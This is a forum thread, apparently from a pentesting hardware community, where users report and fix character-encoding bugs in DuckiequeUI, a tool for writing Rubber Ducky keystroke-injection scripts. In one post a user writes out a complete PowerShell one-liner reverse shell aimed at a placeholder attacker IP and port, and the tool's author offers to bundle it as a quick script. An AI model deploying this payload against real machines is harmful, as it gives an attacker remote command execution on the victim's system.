Jump to content

Recommended Posts

  • 2 weeks later...

Hey I am using the tool now, but I am seeing an odd issue. My payload is using "=" but they are being typed as "+" 

Do you know what might be causing this? 

Link to post
Share on other sites

What language is your "victim" using and what language have you specified when creating the inject.bin file? What's the result if you use the payload ducky code and encode it with an official tool, same thing?

Link to post
Share on other sites

The language is set to default, but I also set it to US.

I don't think it's an issue with the Duckyscript, rather how the DuckiequeUI tool is handeling the "=." I was poking around the source code and I guess there is a tricky thing around the Windows API and the "=." The author listed a TODO around having to figure out how to get around this issue. I am not strong enough with Windows APIs or CPP to even begin to help with a solution though. 

Link to post
Share on other sites

it's nothing I will spend any time on either, I'm perfectly OK with using an ordinary text editor and the official tools in order to create ducky payload scripts and encoded files

Link to post
Share on other sites
18 hours ago, chrizree said:

it's nothing I will spend any time on either, I'm perfectly OK with using an ordinary text editor and the official tools in order to create ducky payload scripts and encoded files

If you read my original post then you know that I was looking for another workflow, and that I was unhappy with debugging using official tools. DuckiequeUI seemed to fit my needs perfectly, which is why I was so invested in resolving this bug. 

 

13 hours ago, kdodge said:

I have fixed the problem of + for =. Thank you for discovering it!


You are awesome! I am going to try downloading this and working with it today. I will report back. Are you planning up update the repo with a new release? Otherwise I will compile it myself. 

Link to post
Share on other sites
1 minute ago, Scout said:

 Are you planning up update the repo with a new release? Otherwise I will compile it myself. 

Scratch that, you already did. And it is working! Thanks again for this great tool and being so quick to fix it. 

  • Like 1
Link to post
Share on other sites

Cool, I'm glad it helps! I have plans to add a new feature too, some quick script buttons that allow loading of basic functions at the current cursors location, like GUI r for instance. If you have any ideas you would like me to add, I will do my best to see if I can implement them (as long as it's not too difficult, lol)

Link to post
Share on other sites

Hey so I found one more bug--it looks like on Windows it doesn't like the "|" and renders just a "?". I also found that when I script "\" it is typed out as a "/". This is interesting because both symbols are on the same button on my keyboard. For reference, I am trying to run the following simple one-liner reverse shell PowerShell payload: 

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Again, sorry I can't help to contribute, but I will sure be a tester! Ha!

  • Like 1
Link to post
Share on other sites
4 hours ago, Scout said:

Rad--and I like the new sidebar! That's nice for quickly adding common actions. 

Can I add your powershell script to the quick scripts? Is there any other short codes you would like me to add?

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...